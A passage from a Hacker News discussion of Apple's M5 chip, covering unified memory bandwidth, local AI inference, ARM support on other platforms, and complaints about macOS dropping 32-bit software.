      And that was already impressive. High-end gaming computers with dual-channel DDR5 only reach ~100GB/s of CPU memory bandwidth.

      • Aurornis 8 hours ago

        High end gaming computers have far more memory bandwidth in the GPU, though. The CPU doesn’t need more memory bandwidth for most non-LLM tasks. Especially as gaming computers commonly use AMD chips with giant cache on the CPU.

        The advantage of the unified architecture is that you can use all of the memory on the GPU. The unified memory architecture wins where your dataset exceeds the size of what you can fit in a GPU, but a high end gaming GPU is far faster if the data fits in VRAM.

      • Rohansi 5 hours ago

        And you can find high-end (PC) laptops using LPDDR5x running at 8533 MT/s or higher which gives you more bandwidth than DDR5.

      • RossBencina 8 hours ago

        Right, but high-end gaming GPUs exceed 1000GB/s and that's what you should be comparing to if you're interested in any kind of non-CPU compute (tensor ops, GPU).

  • Havoc 8 hours ago

    I was looking at that number and thinking opposite - that's oddly slow at least in context of new apple chip.

    Guessing that's their base tier and it'll increase on the higher spec/more mem models.

    • Retr0id 7 hours ago

      Perhaps they're worried that if they make the memory bandwidth too good, people will start buying consumer apple devices and shoving them into server racks at scale.

  • modeless 8 hours ago

    Nvidia DGX Spark has 273 GB/s (2184 gigabits with your units) and people are saying it's a disappointment because that's not enough for good AI performance with large models. All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

    • hannesfur 7 hours ago

      > All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

      That’s true for the on-GPU memory but I think there is some subtlety here. MoE models have slimmed the difference considerably in my opinion, because not all experts might fit into the GPU memory, but with a fast enough bus you can stream them into place when necessary.

      But the key difference is the type of memory. While NVIDIA (Gaming) GPUs ship with HBM memory ship for a while now, the DGX Spark and the M4 use LPDDR5X which is the main source for their memory bottleneck. And unified memory chips with HBM memory are definitely possible (GH200, GB200), they are just less power efficient on low/idle load.

      NVIDIA Grace sidestep: They actually use both HBM3e (GPU) and LPDDR5X (CPU) for that reason (load characteristics).

      The moat of the memory makers is just so underrated…

mrbonner 6 hours ago

I'm waiting for the day when the iphone would be equipped with an M chip. Maybe not long of a wait I hope.

dmitshur 7 hours ago

The claimed 1.6x increase in video game frame rate compared to M4 seems pretty good. Looking forward to seeing it tested out in practice.

SXX 8 hours ago

32GB RAM limit on current M5 models. Now wait for M5 Max.

  • bombcar 8 hours ago

    M5 Max Macs

    If they're studios, you can have stacks of M5 Max Macs.

Insanity 7 hours ago

Assume they released this ahead of their end of month event in response to all the leaks from the past weeks.

mgaunard 3 hours ago

why is Apple focusing on AI? do they have any AI products like Google, Meta or OpenAI?

airza 8 hours ago

I get they want to have a lot of their own swift-based bindings but I wish they could also keep their MPS pytorch bindings up to date...

looneysquash 4 hours ago

Thats cool, but so much software only supports CUDA.

sneak an hour ago

Cool. My maxxed out M4 Max MBP is scheduled for delivery tomorrow. Guess I’ll return it.

  • ppeetteerr an hour ago

    The M5 Pro/Max models are likely going to arrive in March (but maybe earlier)

    • sneak an hour ago

      Oh, the M5s available max out at 32GB ram, even in the MBP. That’s a nonstarter for me in a pro machine.

sbbq 7 hours ago

The chips are great. Now they just need to improve the quite stagnant laptop hardware to go with it.

pier25 7 hours ago

Does the M5 feature the UltraFusion connector which would enable the Ultra variant?

  • ozaiworld 7 hours ago

    that would likely only be present on the Max chip of the M5 generation

    • pier25 4 hours ago

      thanks I had always assumed it needed to be present in the base design of the chip

willahmad 8 hours ago

Are we going to see SOTA local coding models anytime soon with this hardware or is it still long way to go?

  • Etheryte 8 hours ago

    You can already do that, just how slow or fast you go depends on how much you're ready to pay for memory. It's a $1200 premium to go from 36GB to 128GB of unified memory, that cost is hard to justify unless you really need it, or if someone else is paying.

    • willahmad 8 hours ago

      None is comparable to GPT-5 or Sonnet 4.5 experience

      • elzbardico 3 hours ago

        Frankly, right now I am way more satisfied with qwen-3-coder-420 using Cerebras inference than with those more powerful models.

        Inference speed and fast feedback matter a lot more than perfect generation to me.

jdlyga 7 hours ago

If only the Windows ecosystem could make the processor transition as smooth as Mac.

  • lostmsu 6 hours ago

    I don't think it is the ecosystem. The ARM CPUs not from Apple are just too slow.

    • wmf 5 hours ago

      X Elite and N1X are fine; the problem is with Windows.

      • bigyabai 2 hours ago

        As someone who admins Linux and Windows ARM machines, rest assured the issue is not just with Windows. ARM support is best-effort on most distros, and still fairly incomplete even on nixpkgs and Debian unstable.

mittermayr 7 hours ago

This morning I was looking to maybe replace my Macbook Pro 2018, which had the horrible keyboard and finally seems to be crippled enough to not be fun to use anymore — now this!

However, I have been disappointed by Apple too many times (they wouldn't replace my keyboard despite their highly-flamed design-faux-pas, had to replace the battery twice by now, etc.)

Two years ago I finally stopped replacing their expensive external keyboards, which I used to buy once a year or every other (due to broken key-hinges) and have been so incredibly positively surprised by getting used to the MX Keys now. Much better built, incredible mileage for the price. Plus, I can easily switch and use them on my Windows PC, too.

So, about the Macbook — if I were to switch mobile computing over to Windows, what can I replace it with? My main machine is still a Mac Mini M2 Pro, which is perfect value/price. I like the Surface as a concept (replacable keyboards are a fantastic idea, battery however, super iffy nonsense), and I've got a Surface Pro 6 around, but it's essentially the same gloss-premium I don't need for my use.

Are there any much-cheaper but somewhat comparable laptops (12h+ battery, 1 TB disk, 16-32GB RAM, 2k+ Display) with reasonable build quality? Does bypassing the inherent premium of all the Apple gloss open up any useful options? Or is Apple actually providing the best value here?

Would love to hear from non-Surface, non-Thinkpad (I love it, but) folks who've got some recommendations for sub $1k laptops.

Not my main machine, but something I take along train rides, or when going to clients, or sometimes working offsite for a day.

  • vachina 5 hours ago

    LG Gram SuperSlim. Very light (900grams). I once went hiking with it and forgot the laptop was still in the bag.

    But its really only capable of high performance in short bursts because of the extremely small thermal mass.

    • mittermayr 5 hours ago

      thanks for the hint, spec-wise, this is exactly what I meant, 1tb ssd, 16gb ram, 16 hours of battery, very nice. then I saw it's 1700 EUR where I am at the moment, so pretty much Macbook Pro price :(

mrlonglong 5 hours ago

Good old Brits, taking over the world with an ISA extraordinarily efficient that at inception they discovered that the processor still kept operating by sucking voltage from leakage currents even though the power was off.

From: https://www.theregister.com/2012/05/03/unsung_heroes_of_tech...

"> The power test tools they were using were unreliable and approximate, but good enough to ensure this rule of thumb power requirement. When the first test chips came back from the lab on the 26 April 1985, Furber plugged one into a development board, and was happy to see it working perfectly first time.

> Deeply puzzling, though, was the reading on the multimeter connected in series with the power supply. The needle was at zero: the processor seemed to be consuming no power whatsoever.

> As Wilson tells it: “The development board plugged the chip into had a fault: there was no current being sent down the power supply lines at all. The processor was actually running on leakage from the logic circuits. So the low-power big thing that the ARM is most valued for today, the reason that it's on all your mobile phones, was a complete accident."

> Wilson had, it turned out, designed a powerful 32-bit processor that consumed no more than a tenth of a Watt."

StopDisinfo910 8 hours ago

I appreciate Apple propping up the GPU performance of their SoC but it feels a bit pointless when all the libraries they provide are so insular and disconnected from the rest of the industry.

I personally wish they would learn from the failure of Metal.

Also unleashes? Really? The marketing madness has to stop at some point.

  • dralley 7 hours ago

    Not that I've actually used any of these APIs, but supposedly Metal is the best designed Graphics API by a decent margin, it's just handicapped severely by how insular they and their ecosystem are.

    • bigyabai 2 hours ago

      Depends on what you're comparing to. Many people will point to OpenGL and Vulkan as comparisons, which is fair. But those are just the Open Source alternatives, and Metal itself is a proprietary solution competing against other well-designed alternatives like DirectX and NVN.

      I think Metal's ergonomics advantage is a much slimmer lead when you consider the other high-level APIs it competes with.

  • mcv 8 hours ago

    Soon they'll be stomping all over your calculation problems, and then obliterating them!

LarsDu88 4 hours ago

It's disappointing to me how far behind other chipmakers are in having unified gpu/cpu memory bus. Only AMD Strix Halo even attempts this. Well this announcement tipped my hand and I'm finally buying a new macbook :)

davidw 6 hours ago

Are we headed back to the bad old days of very proprietary systems, where megacorps dictate everything?

kotaKat 7 hours ago

Surprised they aren’t beating the “performance per watt” drum they normally would be on Mx releases. I’m assuming this will be a bit of a snoozer until the M5X/M5 Ultra or an M6 hits the pipeline.

If anything, these refreshes let them get rid of the last old crap on the line for M1 and M2, tie up loose ends with Walmart for the $599 M1 Air they still make for ‘em, and start shipping out the A18 Pro-based Macbooks in November.

  • ajross 3 hours ago

    They don't have a new process to launch on, so one wouldn't expect a power metric to improve at all.

busymom0 4 hours ago

> M5 brings its industry-leading power-efficient performance to the new 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro

Not for Mac mini?

  • supernes 4 hours ago

    They'll put it in the Mini when they push out a new Studio to upsell to.

sidcool 7 hours ago

I wonder if they informed Jensen about it.

superkuh 7 hours ago

I know it's only shared system RAM and not VRAM, but the M5's 150GB/s isn't going to be very fast when doing AI inference. A fairly old rtx 3060 12GB does 360GB/s. But I guess quantity is a quality all of it's own when it comes to RAM and inference.

GaggiX 8 hours ago

>The 10-core GPU features a dedicated Neural Accelerator in each core

"The neural engine features a graphic accelerator" probably M6

jdc0589 6 hours ago

this is cool and all, but what im really exited about is the possibility that one day they update their laptops so the keys stop leaving marks on the screen.

I know we are a few major scientific breakthroughs away from that even being remotely possible, but it sure would be nice.

tiahura 8 hours ago

No 16”?

  • adamch 8 hours ago

    They'll announce that along with M5 Pro and Max in March or so.

jadbox 8 hours ago

... no benchmarks?

lenerdenator 8 hours ago

Now if some game companies would just port their wares to Apple Silicon and the MacOS libraries already...

jhart 4 hours ago

[dead]

exabrial 7 hours ago

Apple's software division has lost their way. They've done nothing but add flashy features and move buttons around, deprecating things and breaking backwards compatibility (yeah, 32bit has been awhile now, but alas), meanwhile retreating on stability.

Snow Leopard still remains the company's crown achievement. 0 bloatware, 0 "mobile features on desktop" (wtf is this even a thing?), tuned for absolute speed and stability.

  • morshu9001 2 hours ago

    I liked Snow Leopard too, it was indeed the last focused Mac OS, but there was some memory-related bug that made me update past it. The new OSes aren't so bad, but yeah I don't touch any of the new features.

  • badc0ffee 5 hours ago

    I've heard about rounded corners and low information density windows in Tahoe, but what "mobile features on desktop" are in Sequoia and earlier? The App Store? Launchpad? iCloud? Notifications? You don't need to use those.

  • raw_anon_1111 7 hours ago

    They completely removed hardware support for 32 bit software.

    • morshu9001 2 hours ago

      This was in the Intel generation of Macs. If Windows can support 32-bit software then so should Mac, along with all that 64-bit software that got broken in random Mac updates.

      Ironically I can still run old 32-bit Windows software in Wine on my M1 Mac. Windows software is more stable on a Mac than Mac software.

      • raw_anon_1111 2 hours ago

        Do you think they didn’t know they were moving away from Intel when they did that? Besides code is shared between MacOS and iOS even then. They removed 32 bit support from ARM processors years before they moved to ARM based Macs.

        • morshu9001 2 hours ago

          They probably did, but just because M1 gets released doesn't mean Intel Macs suddenly don't have 32-bit capable hardware. I get why it was easier to drop it in the new OS regardless of hardware, only it throws a lot of software under the bus, and running software is kinda the OS's main job.

          And the hardware isn't a showstopper anyway. Apple did x86-64 on AS, Windows' WoW64 does x86-32 on ARM-32 or even IA-64, and I'll bet Windows will do x86-32 on x86-64 if Intel ever drops the 32 mode. Wine 32on64 will run x86-32 on AS already.

          • raw_anon_1111 an hour ago

            And Windows is also a bloated mess that they couldn’t use on mobile and their ARM initiatives have gone nowhere.

            If you don’t think Windows is a bloated mess, look up all of the different ways you have to represent a “string” depending on the API you are calling.

            • morshu9001 an hour ago

              Sure but those are unrelated. Microsoft doesn't make the chips, and Windows crapiness is its own thing. It not like macOS would turn to crap if they made Rosetta2 support x86-32, or in general stopped breaking all the 3P software.

              • raw_anon_1111 an hour ago

                Windows crapiness is because they won’t deprecate anything ever. Read some of Raymond Chen’s posts about all of the special casing they did for apps that broke on newer versions of Windows because app developers were using unpublished APIs.

                Every bit of backwards compatibility increases the testing surface and the vulnerabilities. In fact, an early bug in Windows NT that you could encode DOS shell commands in the browser URL bar from a client and they wouod run with admin privileges if the server was running IIS.

                Should Apple have also kept 68K emulation around? PPC?

                • morshu9001 13 minutes ago

                  Apple went the other extreme. Even if you use public APIs exactly the way they want, your software will break frequently. This is without even getting into the whole OpenGL vs Metal drama.

                  In Windows they took things a bit too far by not only supporting old stuff but also treating it as first-class. If software is too outdated, it's fair to stick it behind some compat layer that makes it slower, as long as it still runs. But that's not even the biggest problem with Windows, it's Microsoft turning it into adware, also not being Unixlike in the first place.

                  To answer your last question, yes for PPC at least. 68K is too old to matter. Emulation layer doesn't need to hold back the entire system. If it means less dev resources to spend making glass effects and emojis, fine.

nake13 8 hours ago

It seems this generation focuses more on GPU and AI acceleration rather than CPU. The M5 chip allows Apple Vision Pro to render 10% more pixels and operate at up to 120 Hz. It delivers up to four times the peak GPU compute performance compared with M4, provides 30% higher graphics performance, and offers 15% faster multithreaded CPU performance.

ThrowawayR2 6 hours ago

A computing device named M5 with highly advanced AI capabilities meant for enterprise (or Enterprise) computing environments? Uh-oh, I think I'll pass; I saw this episode of Star Trek (TOS: The Ultimate Computer) before. Hope the owner's manual comes with a warning not to wear a red shirt anywhere near it, dohohoho.

(Perhaps it would be safer to wait for The Next Generation?)

exabrial 7 hours ago

> A nearly 30 percent increase in unified memory bandwidth to 153GB/s

I'll believe the benchmarks, not marketing claims, but an observation and a question.

1. AMD EPYC 4585PX has ~89GB/s, with pretty good latency, as long you use 2xdimm

2. How does this compare to the memory bandwidth and latency of M1,M2,M3,M4 in reality with all of the caveats? It seems like M1 was a monumental leap forward, then everything else was a retraction.